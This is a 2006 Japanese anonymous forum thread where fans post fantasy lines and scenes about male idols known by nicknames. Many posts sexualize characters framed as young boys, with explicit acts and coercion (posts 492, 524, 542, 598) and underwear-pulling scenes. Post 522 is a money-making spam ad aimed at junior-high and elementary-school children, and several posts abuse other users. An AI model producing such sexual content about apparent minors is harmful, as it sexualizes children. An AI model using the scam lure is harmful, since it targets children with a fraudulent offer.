445 :ユーは名無しネ:2006/11/08(水) 02:20:32
虫「(鞄に入る)僕を持って帰って☆」

栗「ちょっちゅね!」

446 :ユーは名無しネ:2006/11/08(水) 15:36:51
あたたったたたたったたたたたったたたたたたたt

447 :ユーは名無しネ:2006/11/08(水) 19:48:25
ゑ「うまくしゃべれらいろ…」

448 :ユーは名無しネ:2006/11/08(水) 20:41:29
ちゃんと留守番しててね?虫「わ・・・わかったにゃ」

449 :ユーは名無しネ:2006/11/08(水) 20:45:18
虫「おかえりにゃあ!」
「いい子にしてた?」
虫「うんっ」
「じゃあこの散らかった部屋は何?」
虫「…にゃあ…」

450 :ユーは名無しネ:2006/11/08(水) 20:50:24
蠢く蠢く蠢く蠢く蠢く蠢く蠢く蠢く蠢く蠢く蠢く蠢く蠢く蠢く蠢く蠢く

451 :ユーは名無しネ:2006/11/08(水) 23:07:47
ダギャ「ん?」

452 :ユーは名無しネ:2006/11/09(木) 01:01:53
虫「美しい・・・君は最高だよ!・・・部屋に飾りたい位に愛しい









昆虫らぶ

453 :ユーは名無しネ:2006/11/09(木) 17:25:00
ダギャ「お金あげるからお尻と太ももの間見せてほしいギャ」

454 :ユーは名無しネ:2006/11/09(木) 17:44:48
ニカチャ「実は昨日の晩虫君と栗君にアナルを・・・

455 :ユーは名無しネ:2006/11/09(木) 17:51:45
栗虫「それは言わない約束ですが」

456 :ユーは名無しネ:2006/11/09(木) 17:53:07
ニカチャ(着替え中)
ズリッ!
ニカチャ「きゃわ!やめてよ!」
栗「ははは お前黒ブリ-フなんだな」
ニカチャ「・・・」
栗「俺は白ブリなんだ」
ニカチャ「本当?他の子は?」
栗「レオと鼻の穴は白ブリ 虫君は・・・先輩だしやりずらいんだなこれが」

ニカチャ「?」

457 :ユーは名無しネ:2006/11/09(木) 18:00:26
ゑ(着替え中)
ズリッ!
ゑ「おほっ!?」
栗「うへへゑさん熊さん柄のパンツなんですね」
ゑ「悪いか(`へ´)」

458 :ユーは名無しネ:2006/11/09(木) 18:01:07
ニカチャ「白ブリは汚れが目立つ」

459 :ユーは名無しネ:2006/11/09(木) 18:04:39
プラム「下らない遊びをするな栗」

460 :ユーは名無しネ:2006/11/09(木) 18:23:12
カトカン(着替え中)
ズリッ!
カトカン「お!?おおおおおおおおおおおおおお?」
栗「派手なパンツw・・・・・お前紅白柄のトランクスなんだな」
カトカン「素晴らしいだろう!」


461 :ユーは名無しネ:2006/11/09(木) 18:34:26
>460
ワロタ

462 :ユーは名無しネ:2006/11/09(木) 21:48:16
「カンキンシマスヨ」

463 :ユーは名無しネ:2006/11/09(木) 22:11:47
オマエ マネーモッテル ダカラスキ

464 :ユーは名無しネ:2006/11/09(木) 23:12:12
お風呂一緒に入ろッ♪

465 :ユーは名無しネ:2006/11/10(金) 01:47:15
虫(着替え中)

ズリッ!


栗「………?」

虫「へぇ〜山田白ブリなんだね」
栗「あ…ぅ…あ」
虫「かっわいい♪かっわいい♪」

466 :ユーは名無しネ:2006/11/10(金) 05:15:44
「ふーん…そういうこと言うのはこの口かな?
なんならふさいでやってもいいんだけど?」

467 :ユーは名無しネ:2006/11/10(金) 11:38:36
反対にふさいでやる

468 :ユーは名無しネ:2006/11/10(金) 11:45:24
レオ「山田君パンツ返して!中島君シャツ返してくださいお願いします!〇〇〜僕を助けて?ね?」

469 :ユーは名無しネ:2006/11/10(金) 12:17:50
『俺と一緒に宇宙に行こうや』

あの幸薄い笑顔で言ってホスィ

470 :ユーは名無しネ:2006/11/10(金) 13:05:42
ゑ(僕に天使のコスプレさせるとはどうゆう事ですか!(`へ´)

471 :ユーは名無しネ:2006/11/10(金) 14:06:38
自担からメールが来た
件名

本文 (。人。)この顔文字オッパイに見えない?

472 :ユーは名無しネ:2006/11/10(金) 22:36:08
「だから僕はキラなんかじゃない!!!!」

473 :ユーは名無しネ:2006/11/10(金) 22:39:44
>470モエス

474 :ユーは名無しネ:2006/11/11(土) 00:14:11
ナゴリラ「僕にビキニ着せてバナナ持たせるなんてどうゆう事ですか?…エッチ」

475 :ユーは名無しネ:2006/11/11(土) 01:15:08
ナゴリラ(着替え中)

ズリッ!

ナゴリラ「ウホ!?」

栗「おっ!ナゴリラさんバナナパンツなんですね」
ナゴリラ「バナナの模様が可愛いだろ?」

476 :ユーは名無しネ:2006/11/11(土) 01:20:59
ヲバのショタ妄想キモス
早く子供産んで母性愛にでも目覚めて下さい
あその前に相手がいないか(w


477 :ユーは名無しネ:2006/11/11(土) 01:23:19
( ´,_ゝ`)プッ

478 :ユーは名無しネ:2006/11/11(土) 04:21:57
とりあえずスレタイ読んで出直してほしい…

479 :ユーは名無しネ:2006/11/11(土) 12:06:21
そろそろ・・・イイ?

480 :ユーは名無しネ:2006/11/11(土) 15:09:06
栗「くりきんとん食べる」

481 :ユーは名無しネ:2006/11/11(土) 15:44:45
「タイカマってなに?」

482 :ユーは名無しネ:2006/11/11(土) 15:54:45
自担にフラれ落ち込んでいると、2押しがニコニコしている

「ちょっと何笑ってんのよ?!」
2「だって俺にもチャンスが来たってことだろ?
…さっそくいただいちゃっていいかな?(妖笑)」

483 :ユーは名無しネ:2006/11/11(土) 15:56:27
いただかれてしまえ

484 :ユーは名無しネ:2006/11/11(土) 16:16:02
虫「虫さんが好きです でも〇〇さんの方がもーっと好きです」

485 :ユーは名無しネ:2006/11/11(土) 19:41:18
ねぇ今日虫にファンサ貰ってたでしょ!!(拗ね拗ねモード)
僕も〇〇の傍通りたかった!!
だから今夜はいっぱい甘えちゃうもんねっ
まず膝枕して!
それからねーそれから…一緒にぃ…(顔真っ赤)





おっ…お風呂とか入って欲しいなぁ(最高の笑顔)……いいよね?


やったあ!!






以上を自分は栗で妄想中

486 :ユーは名無しネ:2006/11/11(土) 19:45:45
>485
続編キボン

487 :ユーは名無しネ:2006/11/11(土) 23:05:08
栗より虫の方が似合うなその文章だと

488 :ユーは名無しネ:2006/11/11(土) 23:25:26
>487
じゃ姐さんは逆妄想でヨロ(w
>486
気が向いたら続編考えるよ

489 :ユーは名無しネ:2006/11/11(土) 23:44:03
ぎゃ〜!雨に濡れて下着が透けてる!早くエレベーターに乗ろう!(途中で栗が乗った)

(栗から視線を感じる)
(後ろから抱きつき)
「…お姉さん…我慢できないよぉ…」


490 :ユーは名無しネ:2006/11/11(土) 23:45:48
ショタコンヲバ死ねよ

491 :ユーは名無しネ:2006/11/12(日) 00:00:03
じゃあ

虫「おばちゃんの事好きです」
栗「だからやらせて?」
駄目よ!あぁ駄目よ!やめなさい!

─私の名前は大場カオル52才─何故か年下の可愛い少年に好かれ毎日イヤらしい日を送っている─

キモスキモスキモスキモスキモスキモスキモス

492 :ユーは名無しネ:2006/11/12(日) 01:10:39
約束通りお風呂へ
 
先に入って待ってると腰にタオルを巻いた栗が勢いよく湯船の中へ…
向かいあって座ると栗の手が自分の一部に触れ
(真っ赤になる栗)

うゎ…ごめんね
(しばし沈黙)

あの…ちゃんと触りたいな…さ触ってもいい?

彼の手を掴み胸元へ誘う(更に真っ赤になる栗)
優しく栗の手が胸に置かれる
と優しく触れてただけの手に突然力が入る

(!!思わず甘いため息が漏れる)


ねぇ…気持ちぃぃの?
僕も気持ちぃ!


ん……んぁっっ!!!!!


自分の手が栗の固くなった処を探し当てた
ゆっくりと動かしながら舌を絡める







「もっと気持ち良くしてあげる」




続きは脳内で

493 :ユーは名無しネ:2006/11/12(日) 01:27:19
>492
そのあと黒栗降臨だったら禿モエス(w

494 :ユーは名無しネ:2006/11/12(日) 10:41:06
>490
またおまえか…
この手のスレ覗いては喧嘩ふっかけとるなおまえ

495 :ユーは名無しネ:2006/11/12(日) 13:43:02
栗「うわっwパンツにうんこついてらwww」

496 :ユーは名無しネ:2006/11/12(日) 15:21:38
ラヤカシとかに見つかったらひどいことされたり
外で堂々と会えないかもしれないけど絶対守から俺と付き合って下さい

497 :ユーは名無しネ:2006/11/12(日) 15:26:59


498 :ユーは名無しネ:2006/11/12(日) 15:35:17
ニカチャ「何で俺がうさぎの着ぐるみなんか…」

499 :ユーは名無しネ:2006/11/12(日) 22:29:00
誰か黒栗希望

500 :ユーは名無しネ:2006/11/12(日) 22:40:50
出来れば男前な虫も希望

501 :ユーは名無しネ:2006/11/13(月) 08:36:13
僕が君を守る
私があなたを守る

死ぬときは一緒だ

502 :ユーは名無しネ:2006/11/13(月) 14:04:35
え?なんでここに呼び出したかって?
それはさぁ〜皆の前じゃ恥ずかしいからだよ!
アイラ-ビュ

503 :ユーは名無しネ:2006/11/13(月) 14:31:36
俺初めて君を見たときから恋に落ちてたみたい(半笑い)

504 :ユーは名無しネ:2006/11/13(月) 14:40:17
>503
その五関さん何回見てもワロテしまう(w

505 :ユーは名無しネ:2006/11/13(月) 14:47:49
>504
五関さんに24しますた

ダンディズム満載な告白を

506 :ユーは名無しネ:2006/11/13(月) 16:31:14
虫「僕さぁ、いつも虫のことばっかり話してるけど、ほんとはさぁ…虫より好きなものがあるんだ…

それって〇〇ちゃんなんだけど…
僕と付き合ってくださいっ!お願いしますっ!!」

507 :ユーは名無しネ:2006/11/13(月) 16:59:06
虫らしい告白の仕方だな
キャワ!

508 :ユーは名無しネ:2006/11/13(月) 21:25:03
>499
続編キボンでFA?

509 :ユーは名無しネ:2006/11/13(月) 22:18:19
苺「抱いて抱いて抱いて抱いて〜好きにして〜〇〇の太い腕の中でしばいて砕いてあんあんあん〜♪」

ヒラメ「nwsフウゥウ♪」

栗(禿げにした)「………キスでも…しませんか?」

510 :ユーは名無しネ:2006/11/13(月) 23:51:02
「あのさ、俺の家来てくんね?俺もう我慢できない。。俺とヤろ?毎日でも。
 んで俺の傍にずっと居てよ、な?」

511 :ユーは名無しネ:2006/11/14(火) 00:11:32
おはよ よく寝たねぇ

512 :ユーは名無しネ:2006/11/14(火) 01:00:03
びゅううう

風で白いスカ‐トが捲れ上がる






栗「いやぁ〜ん」

513 :ユーは名無しネ:2006/11/14(火) 03:48:08
>508
FA

514 :ユーは名無しネ:2006/11/14(火) 06:37:21
>510誰?

515 :ユーは名無しネ:2006/11/14(火) 15:47:32
真性包茎っすういっす

516 :ユーは名無しネ:2006/11/14(火) 18:21:38
二人きりの部屋で
突然チューされて驚いていると

虫「僕だって…一応、男なんだよ?
力だって、〇〇チャンより強いかもしれないよ…?」

「な、何言ってんのっ?!ち、力だったら私だって負けてなっ…」

虫「(さえぎって)じゃあ…、試してみる…?」

517 :ユーは名無しネ:2006/11/14(火) 18:49:16
(・∀・)イイ!ブラック虫・栗キボン

518 :ユーは名無しネ:2006/11/15(水) 20:34:29
ニカチャ「ハァ-(*´д`)-ン」

519 :ユーは名無しネ:2006/11/15(水) 23:04:05
栗「ピザってゆうなよ!あ!?またピザって言ったな?次言ったら君に何か見せちゃうかもよ?」

wwwピザwww
「…これを見ろ!!」
……アソコもピザだねw

「!!!」

520 :ユーは名無しネ:2006/11/16(木) 00:17:10
プラム「おねしょしちゃった」

521 :ユーは名無しネ:2006/11/16(木) 00:29:19
くさっ!

522 :mm:2006/11/16(木) 00:43:34
中学生って欲しいものたくさんあるよね??
友達付き合いもあるし…でもバイトはできなぃΣ( ̄Д ̄;)

誰でも簡単お金稼ぎ!

・小学生でもOK!
・口座不要!
・可愛い封筒でお金が送られてきます!
・封筒には会社名等一切書かれていません!
・ノルマ等一切なし!
・年齢性別経験一切不要!
安全かつ絶対稼げます!
まだ迷ってる人は下をクリック!詳細です!

http://www.acport.com/addclickport.cgi?pid=1163604091


523 :ユーは名無しネ:2006/11/16(木) 00:57:50
>516
続きお願い!

524 :ユーは名無しネ:2006/11/16(木) 13:32:11
>516の続き

「なっ、試すって…何を…?」
虫「……○○チャンさぁ、男の子の部屋に夜二人っきりって意味わかってる…?」
「え……??」
虫「…だからぁ、こうゆうことだってばっ」

と押し倒される
慌てて起き上がろうとするが、意外にも力が強い

虫「…ね?僕けっこう力あるでしょ?こんなこともできちゃうんだよ?」
と両手を頭上で一くくりにされ、片手で押さえ付けられる

「…は、離しっ」
虫「離してって言っても離してあげないよ?
だって君は、今から僕のものになるんだから……(妖笑)」




525 :ユーは名無しネ:2006/11/17(金) 00:36:35
>524
さ、最高……………

526 :ユーは名無しネ:2006/11/17(金) 00:50:32
>524さん
もう続きはないんですか?
直ぐじゃなくてもいいんで、続き作って下さい!
『〇〇チャン』は>524さんの事ですか?

でも、これって、言葉じゃなくて完全に物語になってますが…(^ー^;)
まぁいいでしょう(>1さん勝手に変えちゃってすみません!)

527 :ユーは名無しネ:2006/11/17(金) 01:02:41
>526
続きは脳内でお願いします

528 :ユーは名無しネ:2006/11/17(金) 01:04:53
〇〇着替え中

ズリッ!

きゃあああ!

栗「へへ!お姉さん純白パンティなんだね!俺好みぃ♪」

529 :ユーは名無しネ:2006/11/17(金) 01:49:11
このスレ物語化してきてる

530 :ユーは名無しネ:2006/11/17(金) 02:32:47
いーじゃん別に

531 :ユーは名無しネ:2006/11/17(金) 10:17:17
面白いから良し

532 :ユーは名無しネ:2006/11/17(金) 19:47:02
自担より年上設定で・・・
上目で『僕と・・・付き合って・・?』って言われてー
言われたらやべーし

533 :ユーは名無しネ:2006/11/17(金) 19:57:53
「」の前に栗って書かないほうが

534 :ユーは名無しネ:2006/11/18(土) 07:00:46
>528さん
もう続きはないんですね?

535 :ユーは名無しネ:2006/11/18(土) 15:13:08
>534
アンタ続き続きって小説じゃないんだから…
そんなに読みたいならドリ小でも読んでれば?

536 :ユーは名無しネ:2006/11/18(土) 16:02:27
誰もいない廃墟を銃を持ち歩く…はっ!人の気配が!?

栗「おっぱいのペラペラソ-ス!」
ヨダレを垂らしながら小太りの少年?が近づいて来る!私は空き家に隠れた…!

虫「ウンコだ捨てーろー!」今度は細い少年が現れた!

私はトイレに隠れウンコをした
レオ「テコキ!テコキテコキ!」
小さい子供がいた

私はその場でお祈りをした

537 :ユーは名無しネ:2006/11/18(土) 16:27:51
>536
女が書いてると思うと引く

538 :ユーは名無しネ:2006/11/18(土) 16:59:58
ここは腐女子と妄想厨の集まるスレに変更します

539 :ユーは名無しネ:2006/11/18(土) 18:49:50
>538
え?最初っからそうなんじゃないの?(w
スレタイからしてそうじゃん

540 :ユーは名無しネ:2006/11/18(土) 18:59:27
プライドの高い腐女子はこんなしょうもない厨丸出しの文章は書かない

541 :ユーは名無しネ:2006/11/18(土) 19:34:52
もっとリアルなのキボン

542 :ユーは名無しネ:2006/11/18(土) 19:36:40
虫「ちょーだいって言ってみ?」

「え・・・ちょーだい」
虫「いい子」

激しく突かれる

543 :ユーは名無しネ:2006/11/19(日) 07:21:53
笑いそうなんでage

544 :ユーは名無しネ:2006/11/20(月) 17:06:27
「早くいれて」
足を開かせる

栗「気持ち悪い」

545 :ユーは名無しネ:2006/11/20(月) 17:23:31
>540
同感

546 :ユーは名無しネ:2006/11/20(月) 17:40:57
>536
バロス

547 :ユーは名無しネ:2006/11/20(月) 19:57:53
536の元ネタはバイオハザ-ド

548 :ユーは名無しネ:2006/11/20(月) 20:57:56
「嫌とか言ってるけどさ、ここ濡れてるよ…?
……(耳元で)期待してんじゃないの?」

549 :ユーは名無しネ:2006/11/20(月) 22:00:35
「いつもみたいにしてよ?」

550 :ユーは名無しネ:2006/11/21(火) 01:35:18
ね?
僕って意外と力あるでしょ(w天使笑
今度は僕がyouを支配しちゃうよ?いい子にしててね(w悪魔笑


胸に顔を埋め頬が肌に触れる
彼の柔らかな髪が敏感になった部分を刺激する

(んっっ…)
声にならない吐息が漏れ身体中熱を帯びる


どうしたの?(wほっぺ紅いよ(w天使笑
ドキドキしてたね…まだ何もしてあげないよ(w
ちゃんとおねだりしてくれなきゃ…
もっと意地悪しちゃおうかなぁ(w悪魔笑


耳元で彼が囁く
な に し て 欲 し い?(黒天使降臨






続く



かも?




551 :ユーは名無しネ:2006/11/21(火) 01:53:45
>550
キモス

552 :ユーは名無しネ:2006/11/21(火) 14:46:30
>516>524のほうがイイ

553 :ユーは名無しネ:2006/11/21(火) 17:34:20
http://hp34.0zero.jp/666/1948/

554 :ユーは名無しネ:2006/11/21(火) 22:16:38
「涼介〜キス」
栗「クサッ!」

「抱いて」
栗「ワキガクサッ!」


555 :ユーは名無しネ:2006/11/22(水) 08:33:27
ショタヲバ禿キモス

556 :ユーは名無しネ:2006/11/22(水) 12:25:06
>552
禿同

557 :ユーは名無しネ:2006/11/22(水) 16:08:49
何げにこのスレ楽すぃ〜><

558 :ユーは名無しネ:2006/11/22(水) 21:24:46
好きな人と自分の友達が付き合ってて、その話を聞いてもらってる…という設定

「お前…つらくねぇの?」
「……つらいよ、つらいけど……っでも、あの二人が幸せなら…いいかなって…」
「………お前は?」
「えっ?」
「お前は幸せ?」
「……っぇ…」
「お前は……それでいいの?」
「……私は…っ別に…」
「…じゃあさぁ……、俺がお前のこと幸せにしてもいい?」
「……ぇっ?」
「お前が幸せになるまで……つか、そのあとも?…ずっと……
お前の側にいてもいい?」

559 :ユーは名無しネ:2006/11/22(水) 22:25:51
シマンネ

560 :ユーは名無しネ:2006/11/22(水) 23:06:15
>559
ここは面白スレではございません
面白さを求めるなら他へ

561 :ユーは名無しネ:2006/11/23(木) 00:04:48
>558を勝手に別バーゾンで


お前の話つまんねーよ
つかなんでそんなやつ好きなのかわかんねーよ
悪いこと言わないからオレにしとけよ

つか…オレにしてくださいよ

562 :ユーは名無しネ:2006/11/23(木) 00:12:17
何げに裕翔くんのお話を作っている人から
早く続きが来ないかな〜…と、待っている私。
担でもないのに…^^;

563 :ユーは名無しネ:2006/11/23(木) 01:53:50
「ねぇ…膝枕して欲しくなっちゃった。して」
『えー無理。さっき○○がご飯食べたいって言ったから作ってんじゃん…』

すると台所に立ってる自分のもとへやってくる

「ヤダ。ご飯後でいーからぁ…」
「眠いの。だからひ・ざ・ま・く・らっ。膝枕しながら髪撫でてよー」
『んー、じゃもうちょっとで出来るから、後でね』

拗ねる自担(w
自分の傍から離れず、人差し指でツンツンって悪戯しながら邪魔してくる

「ねぇ膝枕してよー、眠いよー。」
『分かった分かった。だからもうちょっと…』

!!!!!突然後ろから力強く抱きついてきた。自担の顔が耳元に近づき





「今すぐお願い聞いてくれないと…悪い子になっちゃうよ?(妖笑)」


564 :ユーは名無しネ:2006/11/23(木) 04:29:39
>558>561
甘いのも強引なのも好きだ(w

565 :ユーは名無しネ:2006/11/23(木) 12:02:24
オマイラみんなショタ?
自担みんな年下ぽい書き方

566 :ユーは名無しネ:2006/11/23(木) 16:33:13
連投ヲバが在駐してるモヨン(w奴は間違いなくショタだとオモ
キモスキモスキモス――――――!!!

567 :ユーは名無しネ:2006/11/23(木) 17:33:19
>565
マジレスすると、私はショタじゃない(゙∀゙;≡;゙∀゙)
今好きな人は年上↑
全員がショタとは限らないはず(゚_゚)(。_。)

568 :ユーは名無しネ:2006/11/23(木) 18:34:53
ていうか虫や栗とタメのヤシが書いてるかもしれんし、ショタとは言い切れんよ

569 :ユーは名無しネ:2006/11/23(木) 21:18:27
自担と夜景を楽しんだ後
別れようとしたら突然自担にぎゅっと抱きしめられ
耳元で「今日は帰さない・・・」or「帰りたくない」と呟かれる

570 :ユーは名無しネ:2006/11/23(木) 22:00:39
帰りたくないとかモヘ

571 :ユーは名無しネ:2006/11/24(金) 03:03:02
自担の運転する車の助手席で、失恋して泣いてる自分
(一通り話は聞いてもらった)

「…ぐすっ……ひっく…ぐすっ………」
「………あんま泣いてるとそのうち事故るかもよ…?」
「…へ?…ぐすっ……なん、で…?」



「ハンドル離して抱きしめたくなるから」

572 :ユーは名無しネ:2006/11/24(金) 12:11:41
虫と栗でタメが書いてるはありえない。
そんなエロリーな事書けるか?


573 :ユーは名無しネ:2006/11/24(金) 14:22:10
書けるでしょ

574 :ユーは名無しネ:2006/11/24(金) 16:44:51
>571
鼻血が・・

575 :ユーは名無しネ:2006/11/24(金) 16:55:02
栗(〇〇可愛いなぁ〜ハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァハィハァハァ…ヤリタイ)皆こう思われたいんだろ

576 :ユーは名無しネ:2006/11/24(金) 19:32:37
>575
ハァハァにまぎれる「ハィ」って何?

577 :ユーは名無しネ:2006/11/24(金) 20:40:35
プッ(・ε・〇)

578 :ユーは名無しネ:2006/11/25(土) 01:08:48
ふみは繋がり
http://13.xmbs.jp/19970721/

579 :ユーは名無しネ:2006/11/25(土) 04:08:42
>576
ギガワロス
ハィってなんじゃろ

580 :ユーは名無しネ:2006/11/25(土) 16:28:13
部屋で自担と2人、テレビを見ている
隣に座っている自担が急に手を握ってきた

「…何?」
「お前の手小せぇー。」
「どうせ小さいですよー。」
「…なぁ。」
「ん?」


「このまま離さなくてもいい?」

581 :ユーは名無しネ:2006/11/25(土) 18:16:21
>580
ほのぼのでイイな〜
手握りたかっただけかい!みたいな

582 :ユーは名無しネ:2006/11/26(日) 14:41:14
>524
このレオ版のが萌え

583 :ユーは名無しネ:2006/11/27(月) 02:50:25
レオはちょっと…

584 :ユーは名無しネ:2006/11/29(水) 14:03:37
あげ

585 :ユーは名無しネ:2006/12/02(土) 18:48:42
以外に楽スィー(^-^)

586 :ユーは名無しネ:2006/12/03(日) 01:48:25
『あのさぁ、・・・あんまり年下扱いしないでくれる?』
『えっ・・・ごめん。そんなつもりじゃなかったんだけど・・・・・んんっぅ?!!』
いきなりベロチュー

顔と顔の距離10cm・妖笑で
『俺も男だからね・・・?かわいいだけじゃないよ?』

587 :ユーは名無しネ:2006/12/03(日) 02:59:04
なぜに年下設定が多いんだ

588 :ユーは名無しネ:2006/12/03(日) 04:24:32
>587
じゃあ年上設定で書いちゃいなよ

589 :ユーは名無しネ:2006/12/04(月) 01:22:24
カトカンで想像した↑

590 :ユーは名無しネ:2006/12/04(月) 01:23:45
京ズ「僕だって男なんだから君でイヤらしい想像したりするんだよ」

591 :ユーは名無しネ:2006/12/04(月) 01:25:28
「やさしくすっから、こっちこいよ…」

592 :ユーは名無しネ:2006/12/04(月) 03:14:31
チョトだけモヘだな

593 :ユーは名無しネ:2006/12/04(月) 03:33:21
>591
ときめいた

594 :ユーは名無しネ:2006/12/04(月) 03:35:30
おまえだからこんなに大きくなってんだよ

595 :ユーは名無しネ:2006/12/04(月) 06:53:41
卑猥

596 :ユーは名無しネ:2006/12/04(月) 13:04:38
>594
それで顔の前に突き出されたら失神する…

597 :ユーは名無しネ:2006/12/04(月) 15:45:47
「俺、お前に話があるんだ…」
「話?なに…?」
「…俺ら、もう恋人やめない?」
「……えっ………」



「恋人やめて、家族にならない?」

598 :ユーは名無しネ:2006/12/04(月) 20:08:57
栗「いじってほしいの?じゃあ足開いて何処いじってほしいのか言ってごらんよ」









栗「アッ!そこイイ!」

599 :ユーは名無しネ:2006/12/05(火) 07:51:20
唇がスゴク荒れて困る〜(>_<)
中々自分に合うリップクリームが無い
ちなみに皆さんは何を使ってますか?
スルーする人はスルーして
答えてくれる人はお願いしますm(__)m

600 :ユーは名無しネ:2006/12/05(火) 07:57:21
んで600っと

601 :ユーは名無しネ:2006/12/05(火) 12:32:42
>599
「僕に最適のリップクリームは、他でもない君の甘〜いリップさ!」

602 :ユーは名無しネ:2006/12/05(火) 13:30:37
顔にかけるお☆

603 :ユーは名無しネ:2006/12/05(火) 15:43:17
カンチョー

604 :ユーは名無しネ:2006/12/05(火) 17:05:09
虫「さびしいよ・・・」

605 :ユーは名無しネ:2006/12/05(火) 17:46:20
(´‘▽‘`) こいつが欲しいんだろ?この豚が!!!(踏む)

606 :ユーは名無しネ:2006/12/05(火) 17:48:12
(´‘▽‘`) ぐちょぐちょのミンチにしてやる!これが俺の愛しかた 舐め尽してやるよ

607 :ユーは名無しネ:2006/12/05(火) 21:27:43


「もーーー!●●ったら可愛いwww」

「頭なでんなよっ!可愛いゆーーな!」

「ゃだwwwめっちゃ可愛い可愛い可愛い」

「・・・・」

ドサッツ

「・・・ぇ?」

「俺だって男だ お前をめちゃくちゃにできるんだぞ・・・!!」

608 :ユーは名無しネ:2006/12/05(火) 22:13:45
(´v`)あの〜
(`v´)ヤラセロ

609 :ユーは名無しネ:2006/12/05(火) 22:17:11
俺のマグナムに何をした!!!!!!!!!!!Ψ!!!12225!

610 :ユーは名無しネ:2006/12/05(火) 22:24:10
(^●●^*)さぁセックスの時間です 優しくしますよ

611 :ユーは名無しネ:2006/12/05(火) 22:40:20
>607
その手のセリフはもうガイシュツ杉だぞ

612 :ユーは名無しネ:2006/12/07(木) 15:21:28
(`へ′)ニカチャハァ━━━━━*´Д`*━━━━━ン!!!!デス!

613 :ユーは名無しネ:2006/12/07(木) 23:36:58
「…襲われたいの?」

614 :ユーは名無しネ:2006/12/08(金) 00:54:04
・・・うんち

615 :ユーは名無しネ:2006/12/08(金) 23:13:08
担「…なに、泣いてんの?」
「…泣いてない(グスッ)」
「泣いてんじゃん…」
「………(グスン)」
(下を向いて後ろを向く)
「……お前泣きたいときくらいさぁ、俺頼れよ」
(後ろからぎゅっ)

616 :ユーは名無しネ:2006/12/09(土) 00:11:34
d




e




a




t




h






617 :ユーは名無しネ:2006/12/09(土) 01:18:51
(栗が上目づかいで見ている)

「ぽんぽこ!」

618 :ユーは名無しネ:2006/12/09(土) 01:56:06
>607
ドサッツ?

619 :ユーは名無しネ:2006/12/09(土) 02:49:27
>618
ワロス(w
そこは突っ込まないでやってくれ(w

620 :599をカキコした張本人:2006/12/09(土) 06:48:39
>601
・・・。

621 :ユーは名無しネ:2006/12/09(土) 10:19:20
「学校行くとき寒いから手袋編んで(w」

お互いの手のひらを合わせてサイズ計る

冷たい自担の手…自分とあまり変わらない位の大きさ

「orz…今はまだ君と変わらないけど」
「来年また手袋作ってもらうよ(wもっと大きなやつ」

可愛い笑顔が零れ…チュッ(ほっぺチュー)


622 :ユーは名無しネ:2006/12/09(土) 11:58:23
泣いているときに
「なに?泣いてんの?」
は漏れもだいぶ萌えす。。。。

623 :ユーは名無しネ:2006/12/09(土) 17:16:16
>622
だよな
そっとしといてくれるのも有りだが優しく声かけてホスィ

624 :ユーは名無しネ:2006/12/09(土) 17:36:07
(´v`)今夜はたっぷりと可愛がってあげよう

625 :ユーは名無しネ:2006/12/09(土) 19:00:53
▼´`)<俺のいないとこで泣くなよ

626 :ユーは名無しネ:2006/12/09(土) 19:38:18
五関さんハァ━━━━━*´Д`*━━━━━ン!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!5555

627 :ユーは名無しネ:2006/12/09(土) 23:03:06
プラム「こっち向いて?」

628 :ユーは名無しネ:2006/12/09(土) 23:14:33
プラム「だめでしょ」

629 :ユーは名無しネ:2006/12/10(日) 00:27:44
プラム「オレだけ見てろよ きっと楽しいぜ?」

630 :ユーは名無しネ:2006/12/10(日) 04:29:51
プラム「俺の鼻整形してくれる人募集中」

631 :ユーは名無しネ:2006/12/10(日) 11:05:10
>>622

いまどき漏れはないだろwww

632 :ユーは名無しネ:2006/12/10(日) 11:32:37
いまどきハイパーはないだろ(www

633 :ユーは名無しネ:2006/12/10(日) 11:37:00




634 :ユーは名無しネ:2006/12/10(日) 12:49:15
(´v`)oO(あ!あのお姉さんオッパイ大きいなぁw揉みて〜wでもオシリ大きいお姉さんも捨てがたいなw掴みてぇw)

トコトコトコトコトコトコトコ

(´v`) おねーさん僕と一緒に遊ばない??(さぁどう料理してくれようwとにかくヤリたい)

(´‘▽‘`) (´v`)

(´v`)ゲッ!

635 :ユーは名無しネ:2006/12/10(日) 13:01:34
バロス

636 :ユーは名無しネ:2006/12/10(日) 13:02:46
ナンパしたってコト?

637 :ユーは名無しネ:2006/12/10(日) 13:13:44
栗「セックスしよう?」

「え…あんた毎回凄い汗垂れ流すから臭いんだよね」

栗「そこをなんとか」
「だーめ!」

ドサッツ


638 :ユーは名無しネ:2006/12/10(日) 13:56:11
>637
だから「ドサッツ」って何だよ

639 :ユーは名無しネ:2006/12/10(日) 14:42:55


640 :ユーは名無しネ:2006/12/10(日) 14:51:45
ドサッじゃなくて?

641 :ユーは名無しネ:2006/12/10(日) 16:17:02
ドサッツw

642 :ユーは名無しネ:2006/12/10(日) 18:29:01
新発売のお菓子にありそうだな
「ドサッとナッツ、ドサッツ新発売(w」

643 :ユーは名無しネ:2006/12/10(日) 20:08:31
>642
wwwwwwwwww
「秋の味覚オサツがドサッと、ドサッツ」でもおk

644 :ユーは名無しネ:2006/12/11(月) 01:50:58
「俺以外のヤシなんか見んな
俺だけ見てろよ…!」

645 :ユーは名無しネ:2006/12/11(月) 19:51:06
鼻の穴「好きだ」

鼻の穴「俺のもんだろ

646 :ユーは名無しネ:2006/12/11(月) 19:54:18
(´v`)中出ししてもいいかな〜?
(´‘▽‘`)いいとも!

647 :ユーは名無しネ:2006/12/11(月) 19:58:20
(´v`)チンカス食え

648 :ユーは名無しネ:2006/12/11(月) 20:00:17
(´v`)潮吹いてんじゃねぇよ

649 :ユーは名無しネ:2006/12/11(月) 20:02:08
(´v`)俺の名はキンタマ星人

650 :ユーは名無しネ:2006/12/11(月) 20:08:06
前立腺、ウンコつくかもしれないけど中指でクニクニしてくれ

651 :ユーは名無しネ:2006/12/11(月) 20:38:00
>646-650
女が書いてるかと思うと本気で引く…

652 :ユーは名無しネ:2006/12/11(月) 20:52:59
>651
pgr

653 :ユーは名無しネ:2006/12/11(月) 22:01:52
(´‘▽‘`)栗の中は気持いいね(´‘▽‘`)あっ!やめてよ栗くん

654 :ユーは名無しネ:2006/12/11(月) 22:03:59
(((゜Д゜;)))

655 :ユーは名無しネ:2006/12/11(月) 23:40:42
クチビル繋ぎ




手も繋ぎ




腰まで繋いじゃう〜




二人のアバンチュール二人でアンッアンアアンアアンッアアンッアアンブレラァ〜ッ


656 :ユーは名無しネ:2006/12/11(月) 23:54:39
きもっ

